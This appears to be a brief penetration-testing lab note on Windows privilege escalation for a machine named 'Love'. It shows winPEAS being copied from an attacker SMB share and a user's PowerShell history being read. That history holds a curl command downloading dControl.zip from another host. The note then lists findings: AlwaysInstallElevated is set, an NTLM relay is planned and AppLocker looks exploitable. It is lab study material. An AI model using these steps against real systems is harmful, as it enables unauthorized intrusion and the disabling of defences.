InfoSec LAB

Love_Automated

Created: 1 min read

PEAS

c:\tmp> copy \\10.10.14.17\smb\winPEASany.exe .
        1 file(s) copied.

Delivery complete over SMB

Executing PEAS

AV Configuration

Additional AV configuration

UAC

PowerShell History

C:\Users\Phoebe\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

C:\tmp> type C:\Users\Phoebe\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
 
curl 10.10.14.9:8000/dControl.zip -o dControl.zip

MSI Installation Policy

AlwaysInstallElevated is SET for both HKLM and HKCU

NTLM

OutboundRestrictions is not set I will attempt to perform the NTLM relay attack

AppLocker

This appears vulnerable

.NET

Privileges

Th current user is part of the Remote Management Users group

Logged Users

The administrator user might have an active session

Interactive Graph View

Backlinks